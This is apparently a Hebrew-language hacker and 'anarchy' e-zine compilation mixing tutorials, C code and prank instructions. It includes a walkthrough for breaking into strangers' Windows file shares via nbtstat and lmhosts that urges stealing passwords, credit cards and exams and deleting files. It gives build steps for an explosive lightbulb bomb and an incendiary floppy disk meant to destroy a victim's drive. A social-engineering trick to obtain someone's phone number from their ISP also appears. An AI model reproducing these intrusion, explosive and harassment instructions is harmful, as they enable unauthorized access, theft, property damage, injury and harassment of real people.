בכל אופן, לחצו על התחל -> הגדרות -> לוח בקרה

 

לוח הבקרה מלא בשטויות. תחפשו קובץ בשם 'רשת' עם סמל של מחשבים שמחוברים למדפסת.

לחצו על ה'רשת' פעמיים עם העכבר. ייפתח לכם חלון חדש. אתם תראו כי רכיבי רשת

כגון TCP/IP ו Dial-Up Adapter מותקנים אצלכם במחשב.

בכדי שתוכלו להשתמש בפרוטוקול ה SMB אתם צריכים ש 3 רכיבי הרשת הבאים

יהיו מותקנים לכם במחשב:

 

* TCP/IP

* NetBEUI

* Client for Microsoft Networks

 

אם אחד מרכיבים אלה לא נמצא ברשימת הרכיבים, אתם צריכים להוסיף אותו.

בלי כל ארבעת רכיבים אלה, אינכם יכולים להתחבר לשיתופים על מחשבים אחרים

מה שלא נותן לכם גישה לקבצים שלהם. חרא. אז אני אתן פה הוראות להתקנת כל רכיב.

דרך אגב, אם יש לכם עוד רכיבים מותקנים, שלא ציינתי פה, זה בסדר גמור ואין עם

זה שום בעיה. טוב, אז כדי להתקין את מה שאולי חסר לכם...

 

TCP/IP

אם חסר לכם רכיב זה, לחצו על הכפתור 'הוספה...'

בחרו ב פרוטוקול -> מיקרוסופט -> TCP/IP. יפה. ט-עים מ-אוד.

 

NetBEUI

אם חסר לכם רכיב זה, לחצו על הכפתור 'הוספה...'

בחרו ב פרוטוקול -> מיקרוסופט -> NetBEUI. יפה. ח-מים. מ-אוד.

 

Client for Microsoft Networks

אם חסר לכם רכיב זה, לחצו על הכפתור 'הוספה...'

בחרו ב לקוח -> מיקרוסופט -> Client for Microsoft Networks. מ-געיל. בעאה.

 

 

טוב, אז עכשיו שיש לכם את שלושת הרכיבים אתם כמעט ומוכנים לפריצה הראשונה שלכם.

מתחת ל "כניסה ראשית לרשת:" בחרו באפשרות Client for Microsoft Networks.

כעת לחצו על כפתור ה OK או פשוט הקישו על מקש ה Enter. אתם תתבקשו להפעיל את

המחשב מחדש. עשו זאת. אם לא נפתח חלון שביקש ממכם לעשות זאת, עשו זאת בכל מקרה.

 

טוב, נכנסתם לווינדוס מחדש, ואתם רוצים כבר להשיג סיסמאות, כרטיסי אשראי,

משחקים, תוכנות, מכתבים אישיים, לשנות ציונים, למחוק לאחרים קבצים,

אז איך לעזאזל פורצים???

אם אני לא טועה זאת אחת השאלות הנפוצות ביותר כיום בעולם הצ'אטים.

טוב, אז תמציאו כתובת איי פי של מחשב שאליו אתם מתכוונים לחדור.

תבדקו שאתם מחוברים לאינטרנט, פתחו חלון דוס, והקלידו:

 

nbtstat -A ipaddress>

 

לדוגמא:

 

nbtstat -A 127.0.0.1>

 

חשוב ש ה A- יהיה 'A' ולא 'a'.

בכל מקרה, אם תקבלו כתגובה:

 

Host not found

 

זה אומר שלא תוכלו לחדור למחשב זה. אז אתם שואלים איך לעזאזל אתם

אמורים למצוא מחשבים עם שיתופים שאליהם כן תוכלו לחדור???

ובכן, חשוב שתבינו פה שאין שיטה או קוד אחד שאייתו אפשר לחדור לכל מחשב בעולם.

זאת דוגמא טובה לדרך מסוימת לניצול חור אבטחה מסוים במערכת מסוימת.

מה שנותן לכם לחדור למחשבים מסוימים.

ובכן, יש לכם 2 אפשרויות:

 

* חדירה למקום שאתם יודעים בוודאות כי יש לו שיתופים (לדוגמא: בית ספר).

* שימוש בסורק שיתופים, ואז לחדור למה שזה מוצא.

 

אז כשיש בידיכם כתובת איי פי של מחשב עם שיתופים, חיזרו לדוס, והקלידו:

 

nbtstat -A ipaddress>

 

כאשר במקום ipaddress את מספר האיי פי. אתם תקבלו טבלה שנראית בערך ככה:

 

 

 

 

 

 

 

 

NetBIOS Remote Machine Name Table

 

Name               Type         Status

---------------------------------------------

COMPUTER      <00>  UNIQUE      Registered

WORKGROUP     <00>  GROUP       Registered

COMPUTER      <00>  UNIQUE      Registered

 

MAC Address = 00-00-00-00-00-00

 

כמו שאתם  רואים החלפתי את כל המספרים ל 00.

אני רוצה שתתמקדו שנייה באפסים שבין ה <>. כאשר אתם רואים שם

את המספר 20, כלומר <20>, זה אומר שלמחשב זה, קיימים שיתופים. כמה מדהים.

אוקי, אז הלכתם לבית ספר, בדקתם את כתובת האיי פי של השרת המרכזי,

או שעשיתם שימוש בסורק, ומצאתם מחשב עם שיתופים, ובבית קיבלתם טבלה עם המספר

<20> מה שאישר את עצם העובדה כי יש לכם פה מחשב עם פוטנציאל רב,

עכשיו אנרכיסטים יקרים, הגיע הזמן לעשות את הדבר הבא:

 

פיתחו את הקובץ:

C:\windows\lmhosts.sam

קראו אותו עם עורך טקסט 2, 3 פעמים. אם לא הבנתם משם כלום, לא נורא.

כעת לחצו על התחל -> הפעלה... והקלידו שם notepad. לחצו על מקש ה Enter.

זה ייפתח לכם את העורך החביב שלנו. תדאגו שאתם מקלידים משמאל לימין של הקובץ.

הקלידו שם את האיי פי של המחשב שבו מצאתם שיתופים. לדוגמא:

127.0.0.1

כעת שימרו את הקובץ בשם הבא:

C:\windows\lmhosts

פשוט כך.

אם יש לכם יותר מכתובת איי פי אחת שברצונכם לפרוץ אליה,

אז תפרידו בין כתובת לכתובת בעזרת הורדת השורה (עם מקש ה Enter)

הקובץ שלכם אמור להיראות כך:

 

127.0.0.1

112.179.15.9

37.105.1.17

 

טוב, אז יש לכם את הקובץ שמור, ועכשיו,

לרגע שחיכיתם לו... לחצו על תפריט התחל -> חפש -> מחשב

ייפתח לכם חלון חדש עם תיבת טקסט קטנה, הקלידו בה את האיי פי של המחשב

שאליו ברצונכם לפרוץ, לדוגמא: 127.0.0.1 זאת אחרי שהאיי פי ששמרתם את האיי פי

בקובץ C:\windows\lmhosts. הקישו על מקש ה Enter וחכו קצת.

לאחר זמן מה זה יימצא לכם מחשב. לחצו עליו פעמיים עם העכבר.

חלון חדש ייפתח שייתן לכם להשתמש במחשב בדיוק כאילו הוא שלכם!!!

ברגע זה, שבו אתם מחטטים בקבצים של המחשב הפרוץ הראשון שלכם, אתם צריכים

להרגיש רגש עצום מלא גאווה, שמחה, והתלהבות. עשיתם את זה!

פצתם למחשב ללא כל שימוש בסוס טרויאני. ללא הורדת תוכנת האקינג של מישהו אחר.

עשיתם את זה, בעצמכם. סחטיין.

 

 

שאלות ובעיות נפוצות:

 

ש: כאשר אני מנסה למחוק לבני זונות קבצים, זה לא מאשר את המחיקה.

 

ת: ישנם מחשבים שביטלו את האפשרות של הכתיבה בשיתופים, ולכן יהיה לכם רק

גישת קריאה מה שאומר שיש לכם גישה לכל הקבצים ותוכלו להעתיק דברים מעניינים

למחשב שלכם האישי, אבל לא תוכלו להעתיק קבצים ממכם אליהם או למחוק להם דברים,

או לגרום לכל שינוי במחשב שלהם. גישה כזאת של קריאה בלבד עדיין יכולה להיות

יעילה ביותר. היא לא תיתן לכם לשנות למישהו בבית ספר את הציון בתעודה, אבל תוכלו

להשיג עותק של המבחן הבא ולחלק אותו לכולם ככה שיהיו מוכנים עם התשובות מראש.

 

 

ש: כשאני לוחץ פעמיים על המחשב שנמצא, זה מבקש סיסמא.

 

ת: במקרים מעטים המחשבים שאליהם ברצונכם לפרוץ יהיו מוגנים עם סיסמא,

במקרה כזה יש לכם ארבעה אפשרויות:

 

* לנחש את הסיסמא

 

* להשתמש בתוכנה שתנסה כל אפשרות בעולם עד שזה יימצא את הסיסמא (לוקח שעות).

 

* לפרוץ את הסיסמא בעזרת תוכנה שתסיר את הסיסמא בעזרת חור אבטחה

  שנמצא בהגדרת הסיסמא לשיתופים במערכת ווינדוס (גם אופציה זאת תיקח שעות).

 

* לוותר על המחשב הזה ולנסות מחשב אחר.

 

אני ממליץ לנסות את האפשרות הראשונה, אם לא הולך לכם אז תעברו לאחרונה.

אבל תעשו מה שבא לכם, ואיך שבא לכם, כי אחרי הכל, זאת הפריצה שלכם.

 

 

ש: איפה אני יכול למצוא סורק שיתופים?

 

ת: הנה כמה שמות של סורקים מפורסמים:

Ogre

Legion

Nbtscan

Vir0x

 

פשוט חפשו אחד מהם באתר חיפוש כגון: altavista.com

השימוש בכל סורק שונה, ולכן פשוט קיראו את קובץ ההוראות המצורף, ובהצלחה..

 

 

ש: איך אוכל להשתמש במדפסת על המחשב הפרוץ?

 

ת: אם תראו שעל המחשב נמצאת מדפסת שגם היא משותפת, לחצו עליה פעמיים.

אתם תתבקשו להתקין את הדרייברים על המחשב שלכם. אחרי שפעולה זאת הסתיימה,

סמנו את הקובץ שברצונכם להדפיס (לא חשוב אם הוא נמצא על המחשב שלכם או שלהם)

לחצו על Ctrl + C, כעת סמנו את המדפסת על המחשב הפרוץ ולחיצו על Ctrl + V.

ההדפסה תחל ותקפיץ את האנשים של המחשב הפרוץ ב - אאאההההההההההה!!!!!!!!!!!

 

 

ש: נגנבתי על הפריצה, זה היה ממש מדליק, אבל היא עובדת רק על מחשבים מסוימים

   ואני רוצה לפרוץ לכל המחשבים בעולם. איך אני יכול לפרוץ לכל מחשב בלי להוריד

   שום תוכנה סתאם ככה מהמחשב שלי עם ווינדוס וחיבור לאינטרנט?

 

ת: Fuck You

 

תרגישו חופשי לפרוץ לאן שבא לכם ולהרוס כל מה שבא לכם, הכל על חשבוני.

                                                           שלכם, גיהינום

 

פצצת מנורה

 

פעולה אוטומטית בכניסה לחדר חשוך היא הדלקת האור.

זה יכול להיות קטלני... אם פצצת מנורה מוקמה במנורת התייקרה.

פצצת מנורה היא קלה ביותר להכנה

בחלק מהמנורות הזכוכית ניתנת לפירוק ע"י חימום של הבסיס עם מבער ריתוך או כיריים

של מטבח וכשהדבק נהיה חם מספיק זה ניתן להסרה.

בחלק אחר של הנורות נדרש חימום נקודתי ע"י מבער ריתוך או מבער אוקסיאצטילן.

בכל אחד מהמקרים, לאחר שהבסיס והזכוכית קוררו לטמפרטורת החדר הם ניתנים למילוי

בחומר נפץ כמו אבק שריפה או כל דבר אחר.

אם הזכוכית נותקה מהבסיס היא חייבים להדביק אותה חזרה, ואם נוצר חור בזכוכית

חייבים לכסות אותו בנייר דבק כדי לשמור את חומר הנפץ בפנים.

לאחר מכן כל שנותר לעשות הוא להבריג את המנורה לתוך בית המנורה

(רצוי לנתק קודם את החשמל לחדר כאמצעי בטיחות :)

 

הכתבה נכתבה ע"י Rel8t.

 

 

אנרכיה

 

בזמן האחרון יש לנו הרבה מקרים של 'אנרכיסטים' שמבינים לא נכון את כל העניין של אנרכיה.

כתבתי אנרכיסטים במירכאות כי אלה לא אנרכיסטים. הם מייצגים את עצמם ואת עצמם בלבד.

ולכן רציתי לכתוב פה כתבה שתסביר מה זה כן האנרכיה. מה בעצם נותן לנו את הרשות לונדליזם,

או לכל דרך אחרת שבה אנו האנרכיסטים מתבטאים. לתת לכם הילדים השמנים בבית, שמשעמם

להם בחיים ורוצים קצת משהו מעניין ולכן קוראים את המילים האלה, לראות הכל מזווית הראיה הנכונה.

ובכן, ניסיתי עוד פעם ועוד פעם ועוד פעם לנסח את האמת שעומדת מאחורי כל הרעיון של האנרכיה.

או איך שאני רואה אותה לפחות. אבל לא משנה מה כתבתי ואיך כתבתי זה לא יצא כמו שרציתי ולא הציג

את הדברים כמו שרציתי שזה יציג אותם. לכן כל מה שאני יכול להגיד לכם זה לראות את הסרט Antz.

אם כי הסרט לא ממש מדבר על אנרכיה, והנמלה בסופו של דבר מחליטה שהדרך הטובה ביותר היא שלטון,

וחיים בתוך מערכת, אלא שהפעם היא חלק מהמערכת מתוך רצון, כאשר לכל אחד יש השפעה חזקה וטובה יותר,

וכולם (כך נראה לפחות) מרוצים מהשלטון החדש, והפעם הכל בנוי כמו שהנמלה רצתה, הסרט עדיין מציג

בצורה כלשהי קצת את הרעיון של אנרכיה. זה לא מציג את זה כמו שהייתי רוצה להציג את זה,

אבל זה עדיף מכל הניסיונות שלי להסביר את ראיית העולם שלי כאנרכיסט.

 

תיהנו מהסרט.

 

                   שלכם, GeHeNoM

 

פצצת דיסקט

 

 

חומרים:

 · דיסקט

 · מספריים

 · גפרורי מטבח לבנים או כחולים (חייבים להיות בצבע הזה!!)

 · לכה שקופה לציפורניים

 

1. פתחו בעדינות את הדיסקט (כאלה של 3 אניץ' ומעלה הכי טובים למטרה זאת).

2. הסירו את עטיפת הכותנה מבפנים.

3. גרדו הרבה אבקה מהגפרורים לתוך צלחת (השתמשו במגרדת מעץ, מתכת תצית את הגפרורים ביחד איתכם ..)

4. אחרי שיש לכם הרבה אבקה, פזרו אותה בנדיבות בתוך הדיסקט.

5. שפכו את הלכה מעל האבקה שפיזרתם.

6. תנו לעסק להתייבש…

7. בזהירות חברו בחזרה את הדיסק והיעזרו בלכה לסגור אותו מבפנים (איפה שפתחתם).

8. תנו את הדיסקט למישהו שאתם מאוד אוהבים…

 

מה שיקרה הוא שכשהכונן ינסה לקרוא את הדיסקט תהיה שרפה קטנה (מספיק חום כדי להימס את כונן הדיסקטים ולדפוק את ראש הקריאה של הכונן!). צפו בהנאה כשהטכנאים לא מבינים מה עבר על המחשב…

 

במדריכי האנרכיה הבאים: איך להפנט בנאדם בעשר דקות, איך לשגע את רשת מקדולנדס, והשיטות הטובות ביותר לגידול מריחואנה בחצר. סתאם, לא. תהיו ילדים טובים כמוני. איכסה אנרכיה.

 

                                                            אוהבת תמיד,

 

                                                                                    בלאדי.

 

 

Port Scaning

 

 

אהללללללןןןןן

מה המצבבבבבבב?

אז ככה - פעם אחת ניסיתי למצוא אינפו על משהו. רציתי להריץ פורט סקאנינג. בדרך כלל אני אוהבת לנסות להיכנס לפורטים הידועים ידנית (דרך טלנט), אבל במקרה ההוא אחרי שעשיתי את הבדיקה הידנית לפורטים הידועים רציתי להריץ סקנינג כולל, לדעת אם יש איזה פורט פתוח אחר. אז העליתי את הקומפיילר שלי, וכתבתי משהו מהיר שיעשה בשבילי את העבודה.

אז... גיהינום ביקש שאני אפרסם את הקוד פה (זה בשפת C) אז הנה פרסמתי. זה היה לפני שהוא עזב את האתר ולא יודעת למה הוא לא פרסם את זה עד עכשיו. בכל מקרה, אל תשתמשו בזה כפורט סקנר כי הוא א-י-ט-י בטירוף (אחרי חצי שעה הוא בקושי הספיק לסרוק פחות מ-50 פורטים) אבל זה תרגול טוב לסוקטים ולתכנות ברמות הנמוכות שדיסקסתי במדריכים הקודמים ושוב, זה משהו שכתבתי ב-5 דקות לצורך מסויים. אז נכון שיש הרבה דברים שיכולתי לעשות כדי להאיץ קצת את הפעולה (לפתוח כמה סוקטים במקביל, להוציא הוראות מהלולאה) או לשפר אותה קצת (לאפשר גם להתחבר ב dns ולא רק בכתובת ip אבל זה תמיד מסתבך לי משום מה) אבל לא היה לי כוח.

 

בעיקרון התוכנה הקטנה הזאת מבקשת את האייפי שאתם רוצים להתחבר אליו (השיגו אותו בעזרת netstat -a) ומנסה להתחבר לפורטים 1-1024 על אותו אייפי. שימו לב להוראה for (port=1;port<1024;port++)

שבודקת את הפורטים 1-1024. אם בא לכם לבדוק מספרים אחרים, פשוט שנו את המספרים. (אפשר גם לדוגמה להריץ פעמיים את התוכנה כאשר אחת סורקת 1-50 ואחת סורקת 1-100 וכדומה). התוכנה שולחת בקשה לפתיחת סוקט בפורטים 1-1024. אם הבקשה נענית בחיוב (יש האזנה על השרת לאותו פורט) התוכנה רושמת את מספר הפורט על המסך.

 

כמו שאמרתי, זה מ-א-ו-ד א-י-ט-י (אבל מאוד!) אז אל תיבהלו אם אחרי עשר דקות אתם עדיין לא רואים כלום על המסך.

 

כדי לבדוק לאיזה פורט התוכנה הגיעה, הקלידו בחלון דוס:

netstat -a

ותראו את כל הפורטים הפתוחים אצלכם. הפורט שלידו כתוב

SYN_SENT

זהו הפורט אליו מנסה התוכנה להתחבר כרגע.

 

בקשר לקומפיילרים, כמובן שאין אין אין כמו gcc אבל אם אתם כמוני שתקועים על ווינדוס, יש תחליף של lcc שזה קומפיילר הבנוי בצורת gcc. קומפיילר מצוין, אבל יש לו את הקריזות שלו, ולכל תוכנית צריך לפתוח פרוייקט חדש בכל פעם, ועד שמצליחים ליצור קובץ חדש יוצאת הנשמה.

#include <stdio.h>

#include <winsock.h>

#include <winsock32.h>

#include <windows.h>

 

void winsock_init(void)

{

            WSADATA info;

            if (WSAStartup(MAKEWORD(1,1), &info) != 0)

                        MessageBox(NULL, "Cannot initialize WinSock!", "WSAStartup", MB_OK);

}

 

 

 

 

int main(int argc,char *argv[])

{

            winsock_init(); /* the windows intialization stuff... */

 

            int sockfd;

            int port;

            struct sockaddr_in dest_addr;

 

            char IP[16]; /* Will hold the IP address we wish to connect to */

 

          printf("\nDestination IP? ");

          gets(IP);

 

            /*bzero(&(my_addr.sin_zero),8);*/ /* why this doesn't work?? */

           

            for (port=1;port<1024;port++)

            {

                        sockfd = socket(AF_INET,SOCK_STREAM,0);

                        dest_addr.sin_family = AF_INET;

                        dest_addr.sin_port = htons(port);

                        dest_addr.sin_addr.s_addr = inet_addr(IP);

                        if (connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) >= 0)

                                    {

                                                printf("\n%d", port);

                                                /* if connected successfully, return port num */

                                    }

 

                        shutdown(sockfd,3); /* Close the socket for sending and receiving */

            }

 

            printf("Connection closed.");

            return 0; /* Return a success value */

}

 

Have fun,

אוהבת,

                                    Bloody.

 

טיפול "משמעתי" בקרציות

 

שלום אחים שלי.

 

הנה טריק קטן שחברים שלכם יחשבו שהם גברים.

 

כל אחד מכיר איזה ילד דפוק ומעצבן שמתקרצץ ומנסה לפרוץ לכם למחשב , לא?

או סתם איזה מפגר שמעצבן אתכם.

פשוט.

תדברו אייתו באי סי קיו או באי אר סי.

 

פיתחו חלון דוס.

הקלידו Netstat -a.

 

גלו את האי פי או את ההוסט שלו.

אם מצאתם איי פי , זה מצוין.

אם מצאת הוסט , הורידו תוכנה ההופכת הוסט לאיי פי.

 

*** הערה מבלאד ראנר: לא צריך תוכנה ההופכת הוסט לאייפי, פשוט הקלידו netstat -an כדי לקבל את הכתובת בצורה נומרית (יענתו בצורת אייפי) ***

 

עכשיו.

הסתכלו על השעון בתחתית המסך.

 

לפי ההוסט ( או האי פי אם אתה טיפה אינטליגנטים) מיצאו את חברת האינטרנט של משתמש זה.

עכשיו , גילשו לאתר של חברת האינטרנט הזאת , ורישמו את מספר הטלפון שלה.

 

כעט , התקשרו לחברת האינטרנט , ואימרו את הדברים הבאים:

 

" מדבר .... הרגע מישהו ניסה לפרוץ לי למחשב ..... והאי פי שלו הוא.....הוא ניסה לפרוץ בשעה...

ותשמעו אמינים לא סתם ילדים קטנים שעושים שטויות.

עכשיו , תקראו טוב את מה שאני רושם עכשיו:

חברת האינטרנט מחויבת לתת לכם את הטלפון של אותו משתמש!!!!!!!!!!!!

עכשיו...

תתקשרו לאותו בן אדם...ותגידו לו מה ניסית לפרוץ לי למחשב........

:)

 

 

שין שן

IceFire3k

 

 

גפרורים שמישים מתחת למים

 

אתם צריכים:

-חבילה של 10 דיודות סיליקון (תדעו שקיבלתם את הדבר הנכון אם אלה חפצים קטנים מזכוכית)

-חבילת גפרורים

-נר

 

 

-הדליקו את הנר ותנו ל"בריכה" של שעווה להיווצר בחלק העליון

 

-הצמידו את החלק מהזכוכית של דיוקה אחת ולפפו את אחד הקצוות שלה מסביב לגפרור והוציאו את הקצה החוצה

 עשו אותו דבר עם הקצה השני אבל בכיוון מנוגד, עכשיו שני הקצוות צריכים להיות מלופפים מסביב לגפרור אבל לא נוגעים אחד בשני!!!!

 

-הכניסו את ראש הגפרור לתוך "בריכת" השעווה כך שיווצר כיסוי עמיד במים

 

-הכינו כמה כאלה שתרצו

 

-כשהדיודה מחוברת לבטריה של 6 וולט, היא מגיעה למה שנקרא מתח שבירה

 כשרוב הרכיבים האלקטרוניים מגיעים לנקודה זו, הם מפיקים כמות גדולה של חום ואור(שנמס מהר מאוד לכתם קטן)

 החום הזה מספיק כדי להצית את הגפרורים שיעבדו מתחת למים. (כשרוב הגפרורים מסרבים להידלק :)

 

IceFire3k

 

 

שרתי פרוקסי

 

"Death Comes To Us All"

Ella Shalvi

 

שרת פרוקסי הוא בעצם שרת אשר דרכו אתם מתחברים לאתר אשר אליו אתם מתחברים.

כלווווווווווווווווווווומממממממממממרררר....

כשאתם נכנסים לאתר מה שקורה זה שדרך ספק האינטרנט שלכם אתם מתחברים לשרת שעליו מאוחסן האתר,

והוא נותן לדפדפן שלכם את הקוד של האתר שפעם היה בנוי מ HTML ומה לעשות שהיום זה לא תמיד ככה.

היום הוא יכול להיות אומנם מורכב מ HTML, אבל זה רק יהיה בין השאר...

כי יש לנו את Flash של מקרומדיה ואל תשכחו את כל ה Script Languages

ויש גם cgi ו asp וכו'. טוב, בכל מקרה, הדפדפן מקבל את

האתר בפורמט Html ואח"כ מתרגם את זה למה שאתם רואים על המסך.

זה פחות-או-יותר מה שקורה.

יותר פחות מאשר יותר.

או מצד שני פחות יותר מאשר פחות.

או בעצם.. לא חשוב.

 

מה ששונה בשימוש בשרת פרוקסי הוא שבמקום להתחבר "ישירות" אל האתר, אתם עושים זאת דרך

שרת הפרוקסי. מה שגורם לשני דברים עיקריים:

1. התחברות מהירה יותר / איטית יותר (תלוי)

2. אנונימיות.

 

כן, אנונימיות. לא,  א.נ.ו.נ.י.מ.י.ו.ת.

כן, לא, כן, לא, כן כן כן כן כן כן כן כן כן.

 

מה גורם להתחברות מהירה יותר?

ובכן, בואו נאמר שהמחשב שלכם הוא A והאתר שאליו אתם רוצים להגיע הוא B.

בכדי שהמחשב A יוכל ליצור קשר עם המחשב B שעליו נמצא האתר, הוא צריך להתחבר דרך מלא מלא

מחשבים. למה? כי ככה. כי המחשבים A ו B מרוחקים מאוד מבחינה גיאוגרפית. A נמצא בישראל,

ו B נמצא באמריקה. אז A עושה את הדרך הבאה:

A - F - U - C - K - T - H - E - G - O - V - E - R - M - E - N - T - B

כלומר, הוא היה צריך להתחבר לכל המחשבים האלה (fuckthegoverment) עד שהוא הגיע ל B.

עכשיו, P, שרת הפרוקסי שלנו, יעזור לנו להגיע לשם יותר מהר. למה? כי במקום להתחבר דרך

כל כך הרבה מחשבים אנחנו עושים את הדבר הבא:

A - F - U - C - K - P - Y  - B

כלומר, אחרי fuck, הוא הגיע לשרת פרוקסי אשר היה צריך להתחבר למחשב יחיד, Y, בכדי להגיע

ליעד הסופי (B), מה שקיצר את כל הדרך. דמיינו את זה כאילו שבמקום ללכת את כל הסיבוב מהבית ספר

למכולת של יהודה, אתם משתמשים בדרך קיצור וחותכים באמצע. כמובן שלפעמים לשרת פרוקסי

יהיה חיבור מהיר יותר מאשר לשרתים אליהם תתחברו אם לא תשתמשו בו מה שייאץ את החיבור עוד יותר.

אבל כמובן שזה לא חייב להיות ככה. יכול להיות שחיבור דרך שרת הפרוקסי רק ייגרום לחיבורים רבים יותר

ואיטיים יותר ובכך יאט את כל התהליך. בשביל להבין את זה דמיינו שבמקום ללכת ישר לבית של אלי

אתם צריכים עכשיו לעשות את כל הסיבוב כי קודם אתם צריכים לעבור דרך הבית של מיכל שהיא בעצם

שרת הפרוקסי ובגללה הכל נהיה יותר ארוך ואיטי. כוס אימא של מיכל, תראו מה היא עושה.

אסור לעבור דרך הבית שלה. מיכל, תסתכלי למה את גורמת.

 

עכשיו בקשר לאנונימיות,

כשאתם מתחברים לאתר בדרך הרגילה, "ישירות", מספר האיי פי שלכם נקלט לשרת.

אבל כשאתם מתחברים דרך שרת הפרוקסי, מספר האיי פי של הפרוקסי נקלט במקום!!!

זה יכול להיות יעיל במקרים רבים ומרובים ואדומים וכחולים וגם צהובים אם בא לכם.

 

אבל מה זה איי פי?

כל פעם שאתם מתחברים לאינטרנט המחשב שלכם מקבל כתובת IP.

IP זה בעצם קיצור ל Internet Protocol, אותו פרוטוקול שאחראי להעברת המידע.

אבל את זה אתם לא צריכים לדעת. מה שכן, מספר איי פי או כתובת איי פי זה מעין

מספר זיהוי של המחשב שלכם. בחיבור מודם רגיל, כל פעם שאתם מתחברים לאינטרנט כתובת

האיי פי שלכם תשתנה. בכדי לבדוק מה כתובת האיי פי שלכם ברגע זה לחצו על תפריט ההתחל,

בחרו בהפעלה והקלידו: winipcfg

לחצו על מקש ה Enter וחלון חדש יופיע.

הסתכלו בתיבה של ה IP Address. יופיעו בה ארבעה מספרים מופרדים בנקודה.

אם אינכם מחוברים כרגע לאינטרנט, הכתובת תהיה 127.0.0.1

 

עכשיו, אחרי שקראתם את כל הזיבולים שלי על שרתי הפרוקסי, אתם בטח מתים להתחבר כבר לאחד.

את האמת, אתם בטח מתים משעמום, וכבר לא בא לכם לקרוא את זה אבל מה עוד כבר יש לכם לעשות עכשיו?

 

בכל מקרה, מאינטרנט אקספלורר (Internet Explorer), בחרו את התפריט Tools ובחרו

ב Internet Options. ייפתח לכם חלון חדש על המסך עם שישה תפריטים למעלה:

General, Security, Content, Connections, Programs, Advanced

לחצו עם העכבר על תפריט ה Connections.

עכשיו חיפשו כפתור שכתוב עליו ...Settings

לחצו על הכפתור.

חפשו איפה שכתוב את המילים Proxy Server.

תדאגו שהתיבה מתחת שבה כתוב Use a proxy server תהיה מסומנת.

אם היא לא מסומנת, סמנו אותה עכשיו. כעת נשאר לכם רק למלא את שני תיבות הטקסט למטה.

התיבה הראשונה היא Address. פה אתם כותבים את כתובת שרת הפרוקסי.

התיבה הבאה שלנו היא Port. כאן אתם כותבים את מספר הפורט שבו שרת הפרוקסי פתוח.

זה בד"כ יהיה 8080 או 8000 אבל ממש ממש לאו דווקא.

אחרי שאתם ממלאים את שני התיבות האלה אתם פשוט לוחצים על כפתור ה OK.

ושוב, לחצו עוד פעם על כפתור ה OK.

אז איפה לעזאזל אתם מוצאים שרת פרוקסי? ואיך אתם יודעים באיזה פורט הוא פתוח?

ובכן, בד"כ לספק האינטרנט שלכם יהיה שרת פרוקסי, תשאלו אותם. אני בטוח שהם ישמחו לעזור.

אם אתם משתמשים בבזק בינלאומי לדוגמא, שרת הפרוקסי הוא: proxy.bezeqint.net

ומספר הפורט הוא: 8080

 

חוץ מזה יש אלפי אתרים המפרסמים שרתי

פרוקסי הפתוחים לציבור הרחב. שני אתרים כאלה הם:

 

http://proxys4all.cgi.net/public.shtml

 

http://tools.rosinstrument.com/cgi-bin/fp.pl/showlines?lines=200&sortor=3

 

וזהו. אני יודע שיצא קצת חרא של כתבה אבל כתב אותה חרא של בנאדם (אם בכלל אפשר לקרוא לי בנאדם),

אז למה ציפיתם?

 

שלכם, של אימא שלי, של אבא שלי, של סבא שלי, של סבתא שלי, של אלוהים (שלא קיים),

של המדינה, של השלטון, של העולם, של חברה שלי, וחברים שלי, וידידים שלי, וידידות שלי,

של המחשב שלי, ושל כל מה ששלי, וכל מה שלא שלי,

 

 

                                         GeHeNoM

 

 

 

 

התקשרויות מחשבים: חלק ראשון:

איך לבנות סרבר

 

"שני דברים הם אינסופיים: היקום והטמטום" (איינשטיין)

 

טוב אז ככה:

הכתבה הזאת לא מיועדת למתחילים או לאנשים רעים כמוכם שמשתמשים בנטבאס או בסאב 7 או בדברים דפוקים כאלה כדי להרגיש שהם "האקרים מגניבים". אז קודם כל, רק שתדעו ש"האקרים מגניבים" כמעט ולא קיימים בגלל שאנשים כמוכם משתמשים בתוכנות. בואו נהיה יותר חכמים ובמקום להוריד אקספלוייט נתכנת אותו.

אז למי המדריך הזה כן מיועד? קודם כל למי שלא הפסיק לקרוא פה.. J אני לא הולכת עכשיו ללמד אתכם שפת C כי ככה, אבל אם יש לכם ידע בשפה, אפילו בסיסי, זה יכול להיות הבסיס לכתיבת אקספלוייטים בעתיד.

היי, בבקשה אל תצפו ממני ליותר מדי כי מה שאני יודעת על הנושא כתבתי פה. אז ככה שאני עוד לא יכולה ללמד אתכם איך לבנות אקספלוייט, אבל, גם זה יבוא J

 

יאללה לעניין:

זוכרים את מבנה 7 השכבות של OSI? הבסיס של TCP/IP? אם כן, אז מה שאנחנו הולכים לעשות עכשיו זה low level programming שזה תכנות בשלוש רמות הנמוכות יותר. איבדתם אותי? לא נורא, זה לא כזה חשוב כרגע.

אז איך בעצם מחשבים מתקשרים ביניהם? דרך sockets.

socket זה מן "שקע" שדרכו עוברת אינפורמציה. כל מה שאתם עושים באינטרנט, גורם לפתיחת התקשרויות sockets. נניח שאתם כותבים בשורת הפקודה בדוס: telnet 156.76.119.7 23

בעצם על האייפי המבוקש (במקרה הזה 156.76.119.7) נמצאת מן תוכנה (daemon) שמחכה להתקשרות. ברגע שמישהו מבקש להתחבר לאותו פורט (במקרה הזה 23) תפקיד התוכנה הוא לאשר לו את ההתקשרות ולהגיב על פקודות שהוא נותן.

מחשב שנמצא במצב "האזנה" (listening) להתקשרויות נכנסות, נקרא "שרת" או server.

המחשב שלכם, שבמקרה הזה שולח בקשה להתקשרות ופקודות לשרת נקרא "לקוח" או client.

כל ההתקשרות שביניהם, מהרגע שהלקוח שולח בקשה להתחברות, ועד שהלקוח או השרת סוגר את ההתקשרות נעשית דרך...

sockets!! :)

 

בואו נכנס קצת יותר לעומק. נניח שאני רוצה לבנות תוכנת שרת, איזה פקודות אני אצטרך?  קודם כל פקודות אתחול של הsockets שאני אכניס לתוכם הגדרות מסוימות, שתלויות באופן ההתקשרות שלי. נצטרך גם פונקציות אתחול של winsock אם אנחנו עובדים עם windows9x.

 

זאת פקודת האתחול של הסוקטים בווינדוז:

 

            WSADATA info;

            if (WSAStartup(MAKEWORD(1,1), &info) != 0)

                        MessageBox(NULL, "Cannot initialize WinSock!", "WSAStartup", MB_OK);

                                   

עכשיו ניצור מופעים (ארגומנטים) של המבנה sockadrr_in שמכיל את הגדרות הסוקט:

struct sockaddr_in my_addr, rmt_addr;

המבנה נראה כך:

 

 

   struct sockaddr_in

{

        short int          sin_family;  /* Address family               */

        unsigned short int sin_port;    /* Port number                  */

        struct in_addr     sin_addr;    /* Internet address             */

